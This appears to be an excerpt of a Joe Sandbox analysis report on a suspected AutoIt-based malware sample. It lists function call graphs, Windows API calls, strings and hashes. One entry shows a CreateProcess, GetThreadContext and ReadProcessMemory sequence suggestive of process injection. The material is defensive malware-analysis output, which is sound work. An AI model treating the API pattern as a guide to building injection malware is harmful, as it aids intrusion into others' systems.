                    • Instruction ID: 10222e01a4b7993ba6ccb92c8497b136eaa1d56cb9eb5c63f38d7e609f8983ff
                    • Opcode Fuzzy Hash: b372e05205f2015c37ecd567e51c8383233eea10a4c42684d62a6ac2f22e1061
                    • Instruction Fuzzy Hash: 3631C1714083089AD725EB60EC4ABDB77ECBF44305F10851AF995920A1EBBC9A9CC796

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1134 77564d-775666 1135 775683 1134->1135 1136 775668-77566d 1134->1136 1137 775685-77568b 1135->1137 1136->1135 1138 77566f-775671 1136->1138 1139 775673-775678 call 778d68 1138->1139 1140 77568c-775691 1138->1140 1148 77567e call 778ff6 1139->1148 1142 775693-77569d 1140->1142 1143 77569f-7756a3 1140->1143 1142->1143 1145 7756c3-7756d2 1142->1145 1146 7756a5-7756b0 call 773020 1143->1146 1147 7756b3-7756b5 1143->1147 1151 7756d4-7756d7 1145->1151 1152 7756d9 1145->1152 1146->1147 1147->1139 1150 7756b7-7756c1 1147->1150 1148->1135 1150->1139 1150->1145 1153 7756de-7756e3 1151->1153 1152->1153 1156 7757cc-7757cf 1153->1156 1157 7756e9-7756f0 1153->1157 1156->1137 1158 7756f2-7756fa 1157->1158 1159 775731-775733 1157->1159 1158->1159 1160 7756fc 1158->1160 1161 775735-775737 1159->1161 1162 77579d-77579e call 780df7 1159->1162 1163 775702-775704 1160->1163 1164 7757fa 1160->1164 1165 77575b-775766 1161->1165 1166 775739-775741 1161->1166 1175 7757a3-7757a7 1162->1175 1170 775706-775708 1163->1170 1171 77570b-775710 1163->1171 1172 7757fe-775807 1164->1172 1168 77576a-77576d 1165->1168 1169 775768 1165->1169 1173 775743-77574f 1166->1173 1174 775751-775755 1166->1174 1177 7757d4-7757d8 1168->1177 1178 77576f-77577b call 774916 call 7810ab 1168->1178 1169->1168 1170->1171 1171->1177 1179 775716-77572f call 780f18 1171->1179 1172->1137 1176 775757-775759 1173->1176 1174->1176 1175->1172 1180 7757a9-7757ae 1175->1180 1176->1168 1182 7757ea-7757f5 call 778d68 1177->1182 1183 7757da-7757e7 call 773020 1177->1183 1195 775780-775785 1178->1195 1194 775792-77579b 1179->1194 1180->1177 1181 7757b0-7757c1 1180->1181 1186 7757c4-7757c6 1181->1186 1182->1148 1183->1182 1186->1156 1186->1157 1194->1186 1196 77580c-775810 1195->1196 1197 77578b-77578e 1195->1197 1196->1172 1197->1164 1198 775790 1197->1198 1198->1194
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                    • String ID:
                    • API String ID: 1559183368-0
                    • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction ID: f0476e0d1d8db384f5ec03ac899d67bba93a2be0b01370cfb3e3afbc7d5d5b12
                    • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction Fuzzy Hash: D151B330B00B09DBDF289F79C88466E77A5AF407A0F64C729F82DD62D0D7B89D518B90
                    APIs
                      • Part of subcall function 00754F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,008162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754F6F
                    • _free.LIBCMT ref: 0078E68C
                    • _free.LIBCMT ref: 0078E6D3
                      • Part of subcall function 00756BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00756D0D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _free$CurrentDirectoryLibraryLoad
                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                    • API String ID: 2861923089-1757145024
                    • Opcode ID: a72a37f2f7ffa8403c8ea8be490563790fa6cc4978a07b85bdd61ce31b9cc30b
                    • Instruction ID: 539f0abec368e4b76dc02074a3398c7bb3077f6824d03b0a05cbb832e727b03e
                    • Opcode Fuzzy Hash: a72a37f2f7ffa8403c8ea8be490563790fa6cc4978a07b85bdd61ce31b9cc30b
                    • Instruction Fuzzy Hash: F0918071A10219EFCF04EFA4CC959EDB7B4FF15314F14446AF815AB291EB78A905CB60
                    APIs
                      • Part of subcall function 007703A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007703D3
                      • Part of subcall function 007703A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 007703DB
                      • Part of subcall function 007703A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007703E6
                      • Part of subcall function 007703A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007703F1
                      • Part of subcall function 007703A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 007703F9
                      • Part of subcall function 007703A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00770401
                      • Part of subcall function 00766259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0075FA90), ref: 007662B4
                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0075FB2D
                    • OleInitialize.OLE32(00000000), ref: 0075FBAA
                    • CloseHandle.KERNEL32(00000000), ref: 007949F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                    • String ID: %~
                    • API String ID: 1986988660-3145668672
                    • Opcode ID: cb7180ca1cca4ddfb09a8255270af7219e369fedfa636ab692c50ed58ff0119e
                    • Instruction ID: 3bc38c4299a827862249cd09fe03372ef9a6c97d90c8db34e13af8822d53189a
                    • Opcode Fuzzy Hash: cb7180ca1cca4ddfb09a8255270af7219e369fedfa636ab692c50ed58ff0119e
                    • Instruction Fuzzy Hash: 8081C8B0902240CEC784DF69A8496D57BEDFF88318310C67AD49AC73A2FB794468CF58
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007535A1,SwapMouseButtons,00000004,?), ref: 007535D4
                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007535A1,SwapMouseButtons,00000004,?,?,?,?,00752754), ref: 007535F5
                    • RegCloseKey.KERNELBASE(00000000,?,?,007535A1,SwapMouseButtons,00000004,?,?,?,?,00752754), ref: 00753617
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: Control Panel\Mouse
                    • API String ID: 3677997916-824357125
                    • Opcode ID: ff5e4892d441396625fe2ff81a9305b53728ce35e7f3b6e3d8e4f694733d2347
                    • Instruction ID: 133d447f1ac2657b5012535708b880ca1f613b3c0b8a83b51fecbc0a5784075f
                    • Opcode Fuzzy Hash: ff5e4892d441396625fe2ff81a9305b53728ce35e7f3b6e3d8e4f694733d2347
                    • Instruction Fuzzy Hash: D5115A71511208BFDB208F64DC40EEEB7B8EF04781F00846AF805D7220E2B69F5497A4
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 036C1A5B
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 036C1AF1
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 036C1B13
                    Memory Dump Source
                    • Source File: 00000000.00000002.2110433162.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_36c0000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                    • Instruction ID: 2f6a084abea824f2d89b29ac5c8bb8ff6b409a525a0b787430980a82baefd012
                    • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                    • Instruction Fuzzy Hash: 23620B30A14258DBEB24CBA4C850BEEB376EF59300F1091A9D10DEB391E7759E81CB59
                    APIs
                      • Part of subcall function 00755045: _fseek.LIBCMT ref: 0075505D
                      • Part of subcall function 007B99BE: _wcscmp.LIBCMT ref: 007B9AAE
                      • Part of subcall function 007B99BE: _wcscmp.LIBCMT ref: 007B9AC1
                    • _free.LIBCMT ref: 007B992C
                    • _free.LIBCMT ref: 007B9933
                    • _free.LIBCMT ref: 007B999E
                      • Part of subcall function 00772F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00779C64), ref: 00772FA9
                      • Part of subcall function 00772F95: GetLastError.KERNEL32(00000000,?,00779C64), ref: 00772FBB
                    • _free.LIBCMT ref: 007B99A6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                    • String ID:
                    • API String ID: 1552873950-0
                    • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                    • Instruction ID: 796aeca3e29dba7aa5884e4efe00fd3cac3c3a9dbf4f2725bd40ae4078f0b151
                    • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                    • Instruction Fuzzy Hash: 7A515DB1904258EFDF249F64CC45ADEBBB9EF48300F1044AEF659A7281DB755A80CF58
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                    • String ID:
                    • API String ID: 2782032738-0
                    • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction ID: 4bc78bf27f2afb397134274d7043d027d0c0b093fb8a1b4db6a4d5dc839b2eb8
                    • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction Fuzzy Hash: BE41C571740705ABDF288E69C88496F77A9EF803E0B24C57DE95D87640E778ED408B44
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: AU3!P/~$EA06
                    • API String ID: 4104443479-1801474073
                    • Opcode ID: a722df41a78d59a34fbc9f33b72cd65a06b69ee088061b57beb1f2be74be465f
                    • Instruction ID: 66ca4c0ec9a4611e91b6af490d41243356a733192373cb7dea6974bb61f5525b
                    • Opcode Fuzzy Hash: a722df41a78d59a34fbc9f33b72cd65a06b69ee088061b57beb1f2be74be465f
                    • Instruction Fuzzy Hash: 90416C32A041949BDF215B64CC677FE7FA5AF0130AF584065EC869A2C2C5ED8DCC83A1
                    APIs
                    • _memset.LIBCMT ref: 0078EE62
                    • GetOpenFileNameW.COMDLG32(?), ref: 0078EEAC
                      • Part of subcall function 007548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007548A1,?,?,007537C0,?), ref: 007548CE
                      • Part of subcall function 007709D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007709F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Name$Path$FileFullLongOpen_memset
                    • String ID: X
                    • API String ID: 3777226403-3081909835
                    • Opcode ID: ba0d662d176931f3ca38e98ab59809276006b04a9bd98cd1804ae34cd81af6bc
                    • Instruction ID: 7c14bfb19ffaf51933c340d614a8bc29c9d7ecf3d7dcedc22496a928f7014505
                    • Opcode Fuzzy Hash: ba0d662d176931f3ca38e98ab59809276006b04a9bd98cd1804ae34cd81af6bc
                    • Instruction Fuzzy Hash: FB219271A002989BDB459B94D849BEE7BF8AF49315F00801AE948E7281DBF8598DCB91
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __fread_nolock_memmove
                    • String ID: EA06
                    • API String ID: 1988441806-3962188686
                    • Opcode ID: 718c693b5f9169a48f42dc08829addb75543d674ccd67bdaf7d670ab1e3337c1
                    • Instruction ID: f3d6004d4ecc7e463d1a6ee4242eed9f3ead08c1dc74d2dbe8bc22abb264390f
                    • Opcode Fuzzy Hash: 718c693b5f9169a48f42dc08829addb75543d674ccd67bdaf7d670ab1e3337c1
                    • Instruction Fuzzy Hash: B5019671904258AEDB28D7A8C85ABEE7BF8DB15301F00859AE656D2181E5B9A6048760
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?), ref: 007B9B82
                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007B9B99
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Temp$FileNamePath
                    • String ID: aut
                    • API String ID: 3285503233-3010740371
                    • Opcode ID: 060e5463cd69482f800d517db648ea7394afb14f003e869021e212030c755142
                    • Instruction ID: 49fd0c968475d0075aa56b949f5e8a51e39a2aed699ced8ae587441542ee3ba2
                    • Opcode Fuzzy Hash: 060e5463cd69482f800d517db648ea7394afb14f003e869021e212030c755142
                    • Instruction Fuzzy Hash: 93D05E7954130DABDB60AB90DC0EF9A773CF704700F0082A2FE65D11A1DEB865988B99
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1a9a48b366fdb3534b659ec4f69353e95d34beb7cbb69799a9d21069289ec451
                    • Instruction ID: d99be66d428c91cebc975c308a1c8eab63c2826c2fddf02a802750a1775c3b4c
                    • Opcode Fuzzy Hash: 1a9a48b366fdb3534b659ec4f69353e95d34beb7cbb69799a9d21069289ec451
                    • Instruction Fuzzy Hash: BBF11671608305DFCB24DF28C484A6ABBE5BF88314F14892EF89A9B251D775ED45CF82
                    APIs
                    • _memset.LIBCMT ref: 00754401
                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 007544A6
                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007544C3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: IconNotifyShell_$_memset
                    • String ID:
                    • API String ID: 1505330794-0
                    • Opcode ID: 6f91ddc0e08d620adfebf211ff9fc8ccff6498a4e4b55ccab5da65a16810a297
                    • Instruction ID: ee4735bc3dc9e65beef0d3021d4126705b480647b39e67d05511d9ae29cb0c4d
                    • Opcode Fuzzy Hash: 6f91ddc0e08d620adfebf211ff9fc8ccff6498a4e4b55ccab5da65a16810a297
                    • Instruction Fuzzy Hash: 3F3150705057419FD720DF64D884BDBBBF8BB48309F00492EE99A83251E7B96988CB92
                    APIs
                    • __FF_MSGBANNER.LIBCMT ref: 00775963
                      • Part of subcall function 0077A3AB: __NMSG_WRITE.LIBCMT ref: 0077A3D2
                      • Part of subcall function 0077A3AB: __NMSG_WRITE.LIBCMT ref: 0077A3DC
                    • __NMSG_WRITE.LIBCMT ref: 0077596A
                      • Part of subcall function 0077A408: GetModuleFileNameW.KERNEL32(00000000,008143BA,00000104,?,00000001,00000000), ref: 0077A49A
                      • Part of subcall function 0077A408: ___crtMessageBoxW.LIBCMT ref: 0077A548
                      • Part of subcall function 007732DF: ___crtCorExitProcess.LIBCMT ref: 007732E5
                      • Part of subcall function 007732DF: ExitProcess.KERNEL32 ref: 007732EE
                      • Part of subcall function 00778D68: __getptd_noexit.LIBCMT ref: 00778D68
                    • RtlAllocateHeap.NTDLL(011D0000,00000000,00000001,00000000,?,?,?,00771013,?), ref: 0077598F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                    • String ID:
                    • API String ID: 1372826849-0
                    • Opcode ID: 2561a4b6d56e2452bedc5e30313994bece53bff15843115ae8b5408d757b330a
                    • Instruction ID: e9b7bae599daa65208a9d3d7e3e1e866ab85026df09d1a90e419a76f8fc80e96
                    • Opcode Fuzzy Hash: 2561a4b6d56e2452bedc5e30313994bece53bff15843115ae8b5408d757b330a
                    • Instruction Fuzzy Hash: 8C01D631341B15EEEE212B34D84966E72489F427F0F10C136F60D9B1C1DEBDAD014A61
                    APIs
                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,007B97D2,?,?,?,?,?,00000004), ref: 007B9B45
                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007B97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 007B9B5B
                    • CloseHandle.KERNEL32(00000000,?,007B97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007B9B62
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: File$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 3397143404-0
                    • Opcode ID: d09704b7b4620657d6702d4d7288206e880809aa1bb2633dc88b7c8b82db4aa9
                    • Instruction ID: 230612e940626c119abb87b8ce971df7adb26fe81a4694d47f44c617cd103778
                    • Opcode Fuzzy Hash: d09704b7b4620657d6702d4d7288206e880809aa1bb2633dc88b7c8b82db4aa9
                    • Instruction Fuzzy Hash: 3EE08632181228B7D7211B54EC09FCA7F28AB05761F148121FB25A90E087B62611979C
                    APIs
                    • _free.LIBCMT ref: 007B8FA5
                      • Part of subcall function 00772F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00779C64), ref: 00772FA9
                      • Part of subcall function 00772F95: GetLastError.KERNEL32(00000000,?,00779C64), ref: 00772FBB
                    • _free.LIBCMT ref: 007B8FB6
                    • _free.LIBCMT ref: 007B8FC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                    • Instruction ID: c50d2a78a5e9f5e0753d9b1935cc7dba445f7a4b2aa1aa02466b312dd18cf473
                    • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                    • Instruction Fuzzy Hash: FEE012A16097018ECE64A578AD44BF357FE5F48390B28081DF45DDB143DE2CE842C524
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID: CALL
                    • API String ID: 0-4196123274
                    • Opcode ID: cd435eb8f68300c35c75d53ff589e765b9d98affb5b7ca003ee3903419106307
                    • Instruction ID: 6c4f6eb335bada358de1d23111f6e1a57b9bae56795c8357a5b0c51708d0b963
                    • Opcode Fuzzy Hash: cd435eb8f68300c35c75d53ff589e765b9d98affb5b7ca003ee3903419106307
                    • Instruction Fuzzy Hash: 4A223870608341DFCB24DF14C495AAABBF1BF45301F14896DE89A8B262D779ED49CB82
